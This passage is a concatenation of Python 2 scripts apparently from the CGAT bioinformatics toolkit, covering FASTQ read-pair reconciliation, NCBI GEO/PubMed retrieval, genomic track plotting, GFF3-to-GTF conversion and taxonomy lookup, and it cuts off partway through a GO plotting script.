id2_getter = PatternGetter(options.id_pattern_2)
else:
id2_getter = plain_getter
if options.method == "reconcile":
        # IMS: switch to not storing the second set of read names and only
        # using them lazily. Since generators do not have a size, keep track
        # of the counts separately.
id_lengths = {fn1: 0, fn2: 0}
def getIds(infile, id_getter=plain_getter):
'''return ids in infile.'''
aread = infile.readline
while True:
l = [aread().rstrip("\r\n") for i in range(4)]
if not l[0]:
break
r = id_getter(l[0].split()[0])
                # decide whether to chop the read number off
id_lengths[infile.name] += 1
if options.chop:
yield r[:-1]
else:
yield r
def write(outfile, infile, take, unpaired_file=None,
id_getter=plain_getter):
'''filter fastq files with ids in take.'''
aread = infile.readline
while True:
l = [aread().rstrip("\r\n") for i in range(4)]
if not l[0]:
break
r = id_getter(l[0].split()[0])
if options.chop:
r = r[:-1]
if r not in take:
if unpaired_file is None:
continue
else:
unpaired_file.write("\n".join(l) + "\n")
else:
outfile.write("\n".join(l) + "\n")
E.info("reading first in pair")
inf1 = IOTools.openFile(fn1)
ids1 = set(getIds(inf1, id1_getter))
E.info("reading second in pair")
inf2 = IOTools.openFile(fn2)
        # IMS: ids2 is no longer kept as a set, but evaluated lazily into the
        # intersection; this gives a large memory saving for a large inf2,
        # particularly if inf1 is small.
ids2 = getIds(inf2, id2_getter)
take = ids1.intersection(ids2)
E.info("first pair: %i reads, second pair: %i reads, "
"shared: %i reads" %
(id_lengths[fn1],
id_lengths[fn2],
len(take)))
if options.unpaired:
unpaired_filename = IOTools.openFile(
options.output_pattern % "unpaired", "w")
else:
unpaired_filename = None
with IOTools.openFile(options.output_pattern % "1", "w") as outf:
inf = IOTools.openFile(fn1)
E.info("writing first in pair")
write(outf, inf, take, unpaired_filename, id1_getter)
with IOTools.openFile(options.output_pattern % "2", "w") as outf:
inf = IOTools.openFile(fn2)
E.info("writing second in pair")
write(outf, inf, take, unpaired_filename, id2_getter)
if options.unpaired:
unpaired_filename.close()
# write footer and output benchmark information.
E.info("%s" % str(c))
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/geo2table.py
```python
import sys
import re
import urllib2
import urllib
import xml.etree.ElementTree as ET
import CGAT.Experiment as E
import CGAT.IOTools as IOTools
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(version="%prog version: $Id: cgat_script_template.py 2871 2010-03-03 10:20:44Z andreas $",
usage=globals()["__doc__"])
parser.add_option("-t", "--test", dest="test", type="string",
help="supply help")
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
params = {'db': 'gds',
'term': 'transcriptome[All Fields] AND "Homo sapiens"[Organism] AND high throughput sequencing[Platform Technology Type]',
'retmax': 5000,
'usehistory': 'y',
}
params = urllib.urlencode(params)
query_filter = 'http://eutils.ncbi.nlm.nih.gov/entrez/eutils/esearch.fcgi'
query_retrieve = 'http://eutils.ncbi.nlm.nih.gov/entrez/eutils/elink.fcgi'
query_fetch = 'http://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi'
query_summary = 'http://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi'
data = urllib2.urlopen(query_filter, params)
etree = ET.parse(data)
root = etree.getroot()
webenv = root.find("WebEnv").text
query_key = root.find("QueryKey").text
uids = [x.text for x in root.findall("*/Id")]
pubmedlist = []
params = {'dbfrom': 'gds',
'db': 'pubmed',
}
params = urllib.urlencode(params)
# necessary to preserve 1to1 links
params += "&" + "&".join(["id=%s" % x for x in uids])
data = urllib2.urlopen(query_retrieve, params)
etree = ET.parse(data)
root = etree.getroot()
map_uid2pmid = {}
for linkset in root.findall("LinkSet"):
uid = linkset.find("*/Id").text
try:
pmid = linkset.find("./LinkSetDb/Link/Id").text
except AttributeError:
pmid = None
map_uid2pmid[uid] = pmid
params = {'db': 'gds',
'id': ",".join(uids)}
params = urllib.urlencode(params)
data = urllib2.urlopen(query_fetch, params).read()
map_uid2accession = {}
map_uid2description = {}
map_pmid2accession = {}
for block in data.split("\n\n"):
uid = re.search("ID: (\d+)", block).groups()[0]
accession = re.search("Accession: (\S+)", block).groups()[0]
map_uid2accession[uid] = accession
lines = block.split("\n")
description = lines[0]
map_uid2description[uid] = description
map_pmid2accession[map_uid2pmid[uid]] = accession.encode(
"ascii", "ignore")
url_pmid = "http://www.ncbi.nlm.nih.gov/pubmed/%s"
url_geo = "http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=%s"
outfile_uid = IOTools.openFile("uids.tsv", "w")
outfile_uid.write("uid\tdescription\tpmid\taccession\n")
for uid in uids:
outfile_uid.write("\t".join(map(str,
(uid,
map_uid2description[uid],
url_pmid % map_uid2pmid.get(uid, ""),
url_geo % map_uid2accession.get(uid, "")))) + "\n")
outfile_pmid = IOTools.openFile("pmid.tsv", "w")
outfile_pmid.write("pmid\tyear\tjournal\ttitle\tabstract\tgeo\n")
E.info("retrieving pubmed records")
# output by pubmed id
for pmid in map_uid2pmid.values():
if pmid is None:
continue
print pmid
# retrieve record
params = {'db': 'pubmed',
'id': pmid,
'retmode': 'xml'}
params = urllib.urlencode(params)
data = urllib2.urlopen(query_fetch, params)
etree = ET.parse(data)
root = etree.getroot()
article = root.find("PubmedArticle")
assert article is not None
journal = article.find("*//Journal")
assert journal is not None
year = journal.find("./JournalIssue/PubDate/Year").text
journal_title = journal.find("Title").text
title = article.find("*//ArticleTitle").text.encode("ascii", "ignore")
try:
abstract = article.find(
"*//AbstractText").text.encode("ascii", "ignore")
except AttributeError:
abstract = ""
outfile_pmid.write("\t".join(map(str,
(url_pmid % pmid,
year,
journal_title,
title,
abstract,
url_geo % map_pmid2accession.get(pmid, "")))) + "\n")
# write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/gff2plot.py
```python
import sys
import os
import ConfigParser
import matplotlib
import pylab
import matplotlib.ticker
import numpy
import CGAT.Experiment as E
import CGAT.IOTools as IOTools
def formatGenomicCoordinate(value, pos=None):
decimals = 0
exps = ['', 'k', 'm', 'g', 't']
suffix = ""
value = int(value)
format = "%%.%if%%s%s" % (int(decimals), suffix)
for exp in xrange(len(exps) - 1, -1, -1):
if value < 1000L ** (exp):
continue
else:
return format % (float(value) / 1000L ** (exp), exps[exp])
break
else:
return str(value)
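# Illustrative output (derived from the function above):
# formatGenomicCoordinate(2000000) returns "2m", formatGenomicCoordinate(500)
# returns "500", and 0 falls through to the plain str() branch.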
def enterParams(o, params):
"""enter params from object o if they exists.
Supply a tuple of name, conversion function for non-string
options.
"""
r = {}
for p in params:
if isinstance(p, tuple):
p, f = p
else:
f = str
if hasattr(o, p):
r[p] = f(getattr(o, p))
return r
def normalizeValuesByWindows(data, window_size=None):
"""normalize to constant window size.
If no window size is given, the smallest window is used. Windows
    smaller than window_size are ignored.
"""
    if not window_size:
window_size = min(map(lambda x: x[1] - x[0], data))
new_values = []
for start, end, value in data:
if end - start < window_size:
continue
start = start - start % window_size
for z in range(start, end, window_size):
new_values.append((z, value))
new_values.sort()
# interpolate values for the same windows with average
xvals = []
yvals = []
last_x = None
values = []
for x, value in new_values:
if last_x != x:
if last_x is not None:
xvals.append(last_x)
yvals.append(numpy.mean(values))
values = []
last_x = x
values.append(value)
    # emit the final window collected by the loop above
    if last_x is not None:
        xvals.append(last_x)
        yvals.append(numpy.mean(values))
    return xvals, yvals
#-------------------------------------------------------------------
#-------------------------------------------------------------------
#-------------------------------------------------------------------
def addPlot(ax, track, contig, nplotted,
nsubplotted=None,
nsubplots=None,
y_min=None,
y_max=None):
"""add a track to an axes object.
"""
if contig not in track.mData:
return
# step function
# datapoint is in window average
xvals = map(lambda x: (x[1] + x[0]) / 2.0, track.mData[contig])
yvals = map(lambda x: x[2], track.mData[contig])
l = len(xvals)
if nsubplots:
plotnum = nsubplotted
else:
plotnum = nplotted
if track.style == "matrix":
# unequal window sizes confuse the image. Therefore, normalize
# xvals and yvals to a constant image size
matrix = pylab.array(yvals)
matrix.shape = (1, len(yvals))
# make sure that the extent of the image and the plot coincide by
# using extent
if nsubplots is not None:
y_width = float(y_max - y_min) / nsubplots
extent = (min(xvals), max(xvals), y_min + y_width *
nsubplotted, y_min + y_width * (nsubplotted + 1))
else:
extent = (min(xvals), max(xvals), min(yvals), max(yvals))
ax.imshow(matrix,
cmap=track.color_scheme,
extent=extent,
interpolation="nearest")
symbol = options.symbols[plotnum % len(options.symbols)]
plot = ax.plot(xvals, yvals, symbol, lw=2)
else:
symbol = options.symbols[plotnum % len(options.symbols)]
plot = ax.plot(xvals, yvals, symbol)
return plot
#-------------------------------------------------------------------
#-------------------------------------------------------------------
#-------------------------------------------------------------------
def plotContig(contig, tracks, options, plot_legend=False,
extra_features=None):
"""plot data for contig."""
if extra_features and "figure" in extra_features:
figure = pylab.figure(**enterParams(extra_features['figure'],
(("figsize", lambda x: map(int, x.split(","))),
("dpi", int),
"facecolor",
"edgecolor")))
else:
figure = pylab.figure()
if plot_legend:
if extra_features and "legend" in extra_features:
legend = pylab.figure(**enterParams(extra_features['legend'],
(("figsize", lambda x: map(int, x.split(","))),
("dpi", int),
"facecolor",
"edgecolor")))
else:
legend = pylab.figure()
lx = legend.add_axes((0.1, 0.1, 0.9, 0.9))
lx.set_title("Legend")
lx.set_axis_off()
else:
legend = None
axes = []
ywidth = 0.8 / float(len(tracks))
yoffset = 0.1
axprops = {}
ayprops = {}
min_x, max_x = 1000000000, 0
for track in tracks:
if track.mData:
min_x = min(min_x, min(map(lambda x: (x[0]), track.mData[contig])))
max_x = max(max_x, max(map(lambda x: (x[1]), track.mData[contig])))
# make sure that we use the same view for all axes
axprops['xlim'] = (min_x, max_x)
nplotted = 0
for track in tracks:
labels, plots = [], []
ax = figure.add_axes(
(0.1, track.mYOffset, 0.8, track.mYWidth), **axprops)
if 'sharex' not in axprops:
ax.xaxis.set_major_formatter(
matplotlib.ticker.FuncFormatter(formatGenomicCoordinate))
ax.set_xlabel("Genomic position / Mb")
axprops['sharex'] = ax
else:
pylab.setp(ax.get_xticklabels(), visible=False)
ax.set_ylabel(track.mTitle, **ayprops)
if track.mSubTracks:
# compute maximum extent of y-axis in all of subtracks
first = True
for tt in track.mSubTracks:
if first:
min_y = min(map(lambda x: x[2], tt.mData[contig]))
max_y = max(map(lambda x: x[2], tt.mData[contig]))
first = False
else:
min_y = min(
min_y, min(map(lambda x: x[2], tt.mData[contig])))
max_y = max(
max_y, max(map(lambda x: x[2], tt.mData[contig])))
nsubplotted = 0
for tt in track.mSubTracks:
plot = addPlot(ax, tt, contig, nplotted,
nsubplotted, len(track.mSubTracks),
min_y, max_y)
nsubplotted += 1
plots.append(plot)
if hasattr(tt, "legend"):
labels.append(tt.legend)
else:
labels.append(tt.mTitle)
else:
min_y = min(map(lambda x: x[2], track.mData[contig]))
max_y = max(map(lambda x: x[2], track.mData[contig]))
if options.global_colours:
n_for_colour = nplotted
else:
n_for_colour = 0
plot = addPlot(ax, track, contig, n_for_colour)
plots.append(plot)
if hasattr(track, "legend"):
                labels.append(track.legend)
else:
labels.append(track.mTitle)
# reduce number of ticks by 2
old_ticks = ax.get_yticks()
step_size = (old_ticks[1] - old_ticks[0]) * 2
new_ticks = list(pylab.arange(old_ticks[0], old_ticks[-1], step_size))
ax.set_yticks(new_ticks)
if nplotted % 2 == 0:
ax.yaxis.set_ticks_position("right")
ax.yaxis.set_label_position("right")
else:
ax.yaxis.set_ticks_position("left")
ax.yaxis.set_label_position("left")
# deal with extra_features
if extra_features:
for key, config in extra_features.items():
if key == "vlines":
if contig not in config.mData:
continue
lines = []
for start, end, value in config.mData[contig]:
lines.append(start)
lines.append(end)
ax.vlines(
lines, min_y, max_y, **enterParams(config, ("colour", "linewidth")))
nplotted += 1
if legend:
lx = legend.add_axes((0.1, track.mYOffset, 0.8, track.mYWidth))
pylab.setp(lx.get_xticklabels(), visible=False)
lx.set_xticks([])
lx.set_yticks([])
lx.text(0.4, 0.5, track.mTitle)
lx.legend(plots, labels, 'center left')
if hasattr(track, "text"):
lx.text(0.6, 0.2, track.text, size="smaller",
clip_on=True)
ax.set_title(contig)
# has to be set at the end, otherwise re-scaled?
ax.set_xlim(min_x, max_x)
return figure, legend
def readData(infile):
"""read data from infile."""
dd = {}
for line in infile:
if line[0] == "#":
continue
d = line[:-1].split("\t")
contig, start, end, score = d[0], int(d[3]), int(d[4]), float(d[5])
# if contig != "I": continue
if contig not in dd:
dd[contig] = []
dd[contig].append((start, end, score))
return dd
class Track:
def __init__(self, title,
priority=0,
data=None,
subtracks=None,
config=None):
self.mTitle = title
self.mData = data
self.mSubTracks = subtracks
self.height = 1.0
self.priority = priority
self.style = "default"
self.color_scheme = None
if config:
for key, value in config.items(section):
setattr(self, key, value)
def layoutTracks(tracks):
"""layout tracks."""
# combine subtracks - these are ordered by appearance
for track in tracks.values():
if track.mSubTracks:
s = []
for subtrack in track.mSubTracks:
s.append(tracks[subtrack])
del tracks[subtrack]
track.mSubTracks = s
# sort by priority and compute heights
total_width = sum(map(lambda x: x.height, tracks.values()))
# convert to list - this is the order in which the tracks will
# be output
tracks = list(tracks.values())
tracks.sort(lambda x, y: cmp(x.priority, y.priority))
yoffset = 0.1
ymax_width = 0.8
for track in tracks:
track.mYOffset = yoffset
width = ymax_width * track.height / total_width
track.mYWidth = width
yoffset += width
return tracks
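# Illustrative layout (assumed tracks): two tracks of height 1.0 share the 0.8
# vertical plotting range, so layoutTracks assigns (mYOffset, mYWidth) of
# (0.1, 0.4) to the first track and (0.5, 0.4) to the second.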
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv is None:
argv = sys.argv
parser = E.OptionParser(
version="%prog version: $Id: gff2plot.py 2781 2009-09-10 11:33:14Z andreas $", usage=globals()["__doc__"])
parser.add_option("-f", "--file", dest="filenames", type="string",
help="files[s] to take data from,stdin = -.")
parser.add_option("", "--symbols", dest="symbols", type="string",
help="symbols to use for each histogram [steps|...].")
parser.add_option("--slide-show", dest="slide_show", type="choice",
choices=("first", "all", "sequence"),
help="do a slide show - otherwise, write image to file.")
parser.add_option("--config", dest="filename_config", type="string",
help="filename of track configuration file.")
parser.add_option("--dpi", dest="dpi", type="int",
help="dpi for hardcopy output.")
parser.add_option("--window-size", dest="window_size", type="int",
help="window-size.")
parser.add_option("--output-filename-pattern", dest="output_pattern_image", type="string",
help="output pattern for images. Should contain a '%(contig)s' pattern .")
parser.add_option("--global-colours", dest="global_colours", action="store_true",
help="cycle through colours for all tracks.")
parser.set_defaults(
filenames=None,
symbols="k-,b-,r-,c-,m-,y-,g-",
output_pattern_image="%(contig)s.png",
slide_show=None,
window_size=None,
filename_config=None,
dpi=None,
global_colours=False,
)
(options, args) = E.Start(parser)
options.symbols = options.symbols.split(",")
#--------------------------------------------------------
# collect all the data
# list of data per source and contig
tracks = {}
extra_features = {}
if options.filenames:
options.filenames = options.filenames.split(",")
if len(args) > 0:
options.filenames = args
if options.filenames:
for filename in options.filenames:
if filename == "-":
infile = sys.stdin
else:
infile = IOTools.openFile(filename)
data = readData(infile)
if filename != "-":
infile.close()
            tracks[filename] = Track(title=filename, data=data)
elif options.filename_config:
# get track information from config file
config = ConfigParser.ConfigParser()
config.read(os.path.expanduser(options.filename_config))
# first extract special sections
for section in config.sections():
if section == "vlines":
infile = IOTools.openFile(config.get(section, "filename"), "r")
data = readData(infile)
infile.close()
extra_features[section] = Track(title=section,
data=data,
config=config)
config.remove_section(section)
elif section in ("figure", "legend"):
extra_features[section] = Track(title=section,
data=None,
config=config)
config.remove_section(section)
n = 0
for section in config.sections():
if config.has_option(section, "filename"):
infile = IOTools.openFile(config.get(section, "filename"), "r")
data = readData(infile)
infile.close()
tracks[section] = Track(title=section,
data=data,
priority=n,
config=config)
elif config.has_option(section, "tracks"):
subtracks = config.get(section, "tracks")
subtracks = map(lambda x: x.strip(), subtracks.split(","))
tracks[section] = Track(title=section,
data=None,
config=config,
priority=n,
subtracks=subtracks)
n += 1
# compile set of all contigs
contigs = set()
for track in tracks.values():
if track.mData:
contigs = contigs.union(track.mData.keys())
# re-arrange tracks and subtracks
tracks = layoutTracks(tracks)
nplots = 0
figures = []
legend = None
for contig in contigs:
figure, l = plotContig(contig, tracks, options,
plot_legend=legend is None,
extra_features=extra_features)
figures.append(figure)
if l:
legend = l
if options.slide_show:
if options.slide_show == "first":
pylab.show()
elif options.slide_show == "all":
pylab.show()
elif options.slide_show == "sequence":
pylab.show()
else:
extra_args = {}
if options.dpi:
extra_args['dpi'] = options.dpi
for contig, figure in zip(contigs, figures):
params = {'contig': contig}
filename = options.output_pattern_image % params
E.info("# creating image: %s" % filename)
figure.savefig(os.path.expanduser(filename), **extra_args)
if legend:
params = {'contig': "legend"}
filename = options.output_pattern_image % params
E.info("creating image: %s" % filename)
legend.savefig(os.path.expanduser(filename), **extra_args)
E.info("ninput=%i, ncontigs=%i, nplots=%i" %
(len(tracks), nplots, len(contigs)))
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/gff32gtf.py
```python
import sys
import CGAT.Experiment as E
import CGAT.GFF3 as GFF3
import CGAT.GTF as GTF
import CGAT.IOTools as IOTools
def search_hierarchy(ID, hierarchy, options):
'''Returns a three element tuple of lists.
    The first two lists are the gene_ids and transcript_ids that are
    associated with the specified ID. The third is a list of possible
    transcript_ids, that is, transcript_ids that are one level below
    where the gene id came from.
    All three lists are guaranteed to be the same length, but both
    transcript lists may contain None values where no transcript_id
    has been found.
    Works by calling itself recursively; this is not efficient, but it
    does deal with the problem of circular references, because the
    recursion limit will be reached quickly.
Can also raise ValueError if no feature of type
options.gene_type is found and options.missing_gene is false
'''
gene_id = []
transcript_id = []
possible_transcript_id = []
entry = hierarchy[ID]
if entry['type'] == options.gene_type:
gene_id.append(hierarchy[ID]['gene_id'])
if not entry['type'] == options.transcript_type:
transcript_id = [None]
possible_transcript_id = [None]
else:
transcript_id = [entry['transcript_id']]
possible_transcript_id = [None]
return (gene_id, transcript_id, possible_transcript_id)
for parent in entry['Parent']:
new_gene_id, new_transcript_id, new_possible_transcript_id = search_hierarchy(
parent, hierarchy, options)
gene_id.extend(new_gene_id)
transcript_id.extend(new_transcript_id)
possible_transcript_id.extend(new_possible_transcript_id)
if options.missing_gene:
possible_transcript_id = [
entry['transcript_id'] if x is None else x for x in possible_transcript_id]
if len(gene_id) == 0 and options.missing_gene:
gene_id = [entry['gene_id']]
transcript_id = [None]
possible_transcript_id = [None]
elif len(gene_id) == 0 and not options.missing_gene:
raise ValueError(
"Root found without finding an object of type %s" % options.gene_type)
if entry['type'] == options.transcript_type:
transcript_id = [
entry['transcript_id'] if x is None else x for x in transcript_id]
assert len(gene_id) == len(transcript_id) and len(
transcript_id) == len(possible_transcript_id)
assert len(gene_id) > 0
return gene_id, transcript_id, possible_transcript_id
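# Illustrative call (assumed hierarchy and default options, i.e.
# gene_type="gene", transcript_type="mRNA", missing_gene=True): for
#   hierarchy = {
#       "gene1": {"type": "gene", "Parent": [], "gene_id": "gene1", "transcript_id": "gene1"},
#       "mRNA1": {"type": "mRNA", "Parent": ["gene1"], "gene_id": "mRNA1", "transcript_id": "mRNA1"},
#       "exon1": {"type": "exon", "Parent": ["mRNA1"], "gene_id": "exon1", "transcript_id": "exon1"}}
# search_hierarchy("exon1", hierarchy, options) returns
# (["gene1"], ["mRNA1"], ["mRNA1"]).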
def convert_hierarchy(first_gffs, second_gffs, options):
''' Converts GFF to GTF by parsing the hierarchy.
First parses :param:first_gffs to build the hierarchy then iterates over second_gffs
using a call to the recursive function search_hierarchy to identify gene_ids and transcript_ids.
If multiple gene and transcript_ids are found outputs a record for each combination.
If no definitive transcript_id is found and options.missing_gene is True, it will use the
possible_transcript_id as transcript_id, which is the ID one level below the entry used as gene_id.
    If this is also None (that is, there was only one level), sets transcript_id to gene_id.
Might raise ValueError if options.missing_gene is false and either no gene or no transcript_id
was found for an entry.
Might raise RuntimeError if the recursion limit was reached because the input contains circular
references. '''
hierarchy = {}
for gff in first_gffs:
if not(options.parent == "Parent"):
if options.parent in gff.asDict():
gff['Parent'] = gff[options.parent].split(",")
else:
gff['Parent'] = []
hierarchy[gff['ID']] = {
"type": gff.feature,
"Parent": gff.asDict().get("Parent", []),
"gene_id": gff.attributes.get(
options.gene_field_or_pattern, gff['ID']),
"transcript_id": gff.attributes.get(
options.transcript_field_or_pattern, gff['ID'])}
for gff in second_gffs:
if options.discard and (
(options.missing_gene and options.parent not in gff) or (
gff.feature in (options.gene_type, options.transcript_type))):
continue
gene_ids, transcript_ids, poss_transcript_ids = search_hierarchy(
gff['ID'], hierarchy, options)
assert len(gene_ids) > 0 and len(transcript_ids) > 0
if options.missing_gene:
transcript_ids = [poss if found is None else found
for found, poss in
zip(transcript_ids, poss_transcript_ids)]
transcript_ids = [gid if found is None else found
for found, gid in
zip(transcript_ids, gene_ids)]
elif None in transcript_ids:
raise ValueError("failed to find transcript id for %s" % gff['ID'])
for gene_id, transcript_id in zip(gene_ids, transcript_ids):
gff.gene_id = gene_id
gff.transcript_id = transcript_id
gtf_entry = GTF.Entry()
gtf_entry.copy(gff)
if "Parent" in gtf_entry:
gtf_entry['Parent'] = ",".join(gtf_entry['Parent'])
options.stdout.write(str(gtf_entry) + "\n")
def convert_set(gffs, gene_pattern, transcript_pattern, options):
''' creates the gene_id and transcript_id fields from a string format pattern using
fields of the gff. '''
for gff in gffs:
gff.gene_id = str(gene_pattern) % gff.asDict()
        gff.transcript_id = str(transcript_pattern) % gff.asDict()
gtf_entry = GTF.Entry()
gtf_entry.copy(gff)
if "Parent" in gtf_entry:
gtf_entry['Parent'] = ",".join(gtf_entry['Parent'])
options.stdout.write(str(gtf_entry) + "\n")
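# Illustrative pattern (assumed --method=set-field with the default
# --gene-id=ID and --transcript-id=ID): main builds the pattern "%(ID)s", so
# convert_set copies gene_id and transcript_id from each record's ID attribute.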
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv is None:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(version="%prog version: $Id$",
usage=globals()["__doc__"])
parser.add_option("-m", "--method", dest="method", type="choice", action="store",
choices=(
"hierarchy", "set-field", "set-pattern", "set-none"),
help="Method to use for conversion")
parser.add_option("-g", "--gene-type", dest="gene_type", type="string",
help="feature type to get gene_id from if possible [%default]")
parser.add_option("-t", "--transcript-type", dest="transcript_type", type="string",
help="feature type to get transcript_id from if possible [%default]")
parser.add_option("-d", "--no-discard", dest="discard", action="store_false",
help="Do not discard feature types specified by GENE_TYPE and TRANSCRIPT_TYPE")
parser.add_option("--gene-id", dest="gene_field_or_pattern", type="string",
help="Either field or pattern for the gene_id [%default]")
parser.add_option("--transcript-id", dest="transcript_field_or_pattern", type="string",
help="Either field or pattern for the transcript_id [%default]")
parser.add_option("--parent-field", dest="parent", type="string",
help="field that specifies the parent relationship. Currently only"
"if left as Parent will features with multiple parents be parsed"
"correctly""")
parser.add_option("--read-twice", dest="read_twice", action="store_true",
help="Instead of holding the whole file in memory, read once for parsing the "
"hierarchy, and then again for actaully doing the conversion. Means a real file "
"and not a pipe must be provided.""")
parser.add_option("--by-chrom", dest="by_chrom", action="store_true",
help="Parse input file one choromosome at a time. Reduces memory usage, "
"but input must be sorted by chromosome and features may not split accross "
" multiple chromosomes""")
parser.add_option("--fail-missing-gene", dest="missing_gene", action="store_false",
help="Fail if no feature of type GENE_TYPE is found instead of using "
"defaulting to highest object in hierarchy""")
parser.set_defaults(
method="hierarchy",
gene_type="gene",
transcript_type="mRNA",
discard=True,
gene_field_or_pattern="ID",
transcript_field_or_pattern="ID",
read_twice=False,
by_chrom=False,
missing_gene=True,
parent="Parent"
)
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
gffs = GFF3.flat_file_iterator(options.stdin)
if options.by_chrom:
gffs = GFF3.chrom_iterator(gffs)
else:
gffs = [gffs]
# running early so that fails early if configuration is wrong
if options.read_twice:
# Will throw IOError if options.stdin is not a normal file
second_gff = GFF3.flat_file_iterator(
IOTools.openFile(options.stdin.name))
if options.by_chrom:
second_gff = GFF3.chrom_iterator(second_gff)
else:
second_gff = iter([second_gff])
else:
second_gff = None
for chunk in gffs:
if options.read_twice:
second_gff_chunk = second_gff.next()
else:
chunk = list(chunk)
second_gff_chunk = chunk
if options.method == "hierarchy":
convert_hierarchy(chunk, second_gff_chunk, options)
elif options.method == "set-field":
gene_id_pattern = "%%(%s)s" % options.gene_field_or_pattern
transcript_id_pattern = "%%(%s)s" % options.transcript_field_or_pattern
convert_set(chunk, gene_id_pattern, transcript_id_pattern, options)
elif options.method == "set-pattern":
convert_set(chunk, options.gene_field_or_pattern,
options.transcript_field_or_pattern, options)
elif options.method == "set-none":
convert_set(chunk, None, None, options)
# write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/gi2parents.py
```python
import sys
import optparse
import CGAT.IOTools as IOTools
import CGAT.Experiment as E
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = optparse.OptionParser(version="%prog version: $Id: script_template.py 2871 2010-03-03 10:20:44Z andreas $",
usage=globals()["__doc__"])
parser.add_option("-g", "--gi-accessions", dest="gi_accessions", type="string",
help="list of gi accession numbers")
parser.add_option("-m", "--ncbi-map", dest="ncbi_map", type="string",
help="ncbi.map file downloaded from the MEGAN website")
parser.add_option("-n", "--nucl-map", dest="nucl_map", type="string",
help="gi mapping to tax id downloaded from ncbi website")
parser.add_option("-c", "--taxa-code", dest="taxa_code", type="string",
help="code for different levels of the taxonomy downloaded from the MEGAN website")
parser.add_option("-t", "--tree", dest="tree", type="string",
help="description of parents in the taxonomy")
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
E.info("reading gi accession numbers")
gi_accessions = set()
for line in open(options.gi_accessions).readlines():
gi_accessions.add(line[:-1])
E.info("read gi accession numbers")
E.info("building gi2taxid map")
gi2taxid = {}
c_gi = 0
for line in IOTools.openFile(options.nucl_map).readlines():
data = line[:-1].split("\t")
if data[0] not in gi_accessions:
continue
else:
c_gi += 1
gi2taxid[data[0]] = data[1]
E.info("built gi2taxid for %i gi accession numbers" % c_gi)
E.info("building code map")
code2taxa = {}
for line in open(options.taxa_code).readlines():
data = line[:-1].split("\t")
code2taxa[data[0]] = data[1]
E.info("built taxa code map")
E.info("building taxa2name map")
taxid2name = {}
for line in open(options.ncbi_map).readlines():
data = line[:-1].split("\t")
# keep the taxa code
taxid2name[data[0]] = (data[1], data[3])
E.info("built taxa2name map")
E.info("build taxid2parentmap")
taxid2parents = {}
for line in open(options.tree).readlines():
data = line[:-1].split("\t")
data = [x for x in data if x != "|"]
taxid2parents[data[0]] = data[1]
E.info("built taxid2parentmap")
E.info("retrieving parents for each gi accession number")
options.stdout.write(
"gi\tsub_species\tspecies\tgenus\tfamily\torder\tclass\tphylum\n")
for gi, taxid in gi2taxid.iteritems():
# this will be the sub species id
# walk through the parents
parents = {}
sub_species = taxid2name[taxid][0]
for i in range(len(code2taxa.keys())):
parent_taxid = taxid2parents[taxid]
parent_name = taxid2name[parent_taxid][0]
parent_code = taxid2name[parent_taxid][1]
# ignore codes that we are not interested in
if parent_code not in code2taxa.keys():
continue
parent_taxa = code2taxa[parent_code]
parents[parent_taxa] = parent_name
taxid = parent_taxid
if "genus" not in parents:
genus = "NA"
else:
genus = parents["genus"]
if "family" not in parents:
family = "NA"
else:
family = parents["family"]
if "order" not in parents:
order = "NA"
else:
order = parents["order"]
if "class" not in parents:
_class = "NA"
else:
_class = parents["class"]
if "phylum" not in parents:
phylum = "NA"
else:
phylum = parents["phylum"]
if phylum.find("<phylum>") != -1:
phylum = phylum.replace(" <phylum>", "")
if "species" not in parents:
species = "NA"
else:
species = parents["species"]
options.stdout.write("\t".join([gi, sub_species.replace(" ", "_"), species.replace(
" ", "_"), genus, family, order, _class, phylum]) + "\n")
# write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/go2svg.py
```python
import os
import sys
import string
import re
import math
import tempfile
import bisect
import numpy
import CGAT.Experiment as E
import CGAT.SVGdraw as SVGdraw
import CGAT.CorrespondenceAnalysis as CorrespondenceAnalysis
import CGAT.Stats as Stats
class DataPoint:
def __init__(self):
pass
class DataFDR:
def __init__(self):
pass
def Collect(infile,
with_headers=False,
annotator_format=False,
use_annotator_fdr=False,
delims="",
ignore="",
max_pvalue=1.0,
max_qvalue=None):
"""read input table."""
data = []
lines = filter(lambda x: x[0] != "#", infile.readlines())
if len(lines) == 0:
return data
if with_headers:
del lines[0]
if annotator_format:
lines = [line for line in lines if not line.startswith("Iteration")]
annotator_fdr = {}
annotator_level = None
for line in lines:
if len(line) == 1:
continue # skip trailing blank lines
if line.startswith("--"):
if line.startswith("-- False"):
annotator_level = float(
re.search("-- False Discovery summary for p-value (.+):", line).groups()[0])
annotator_fdr[annotator_level] = {}
elif line.startswith("-- Category"):
pass
else:
if re.search("insufficiently", line):
continue
dd = re.split("\s+", line[4:-1])
d = DataFDR()
d.mObserved, d.mAverage, d.mMedian, d.m95 = map(
float, dd[1:])
annotator_fdr[annotator_level][dd[0]] = d
continue
else:
if line[0] == "Z":
continue # skip header
if len(line[:-1].split('\t')) != 9:
continue # HACK: accounts for a bug in Annotator output
try:
(z, percentchange, pvalue, observed, expected, low95,
up95, stddev, description) = line[:-1].split('\t')[:9]
except ValueError:
raise ValueError("# parsing error in line: %s" % line[:-1])
d = DataPoint()
d.mAnnotation = description
d.mPValue = float(pvalue)
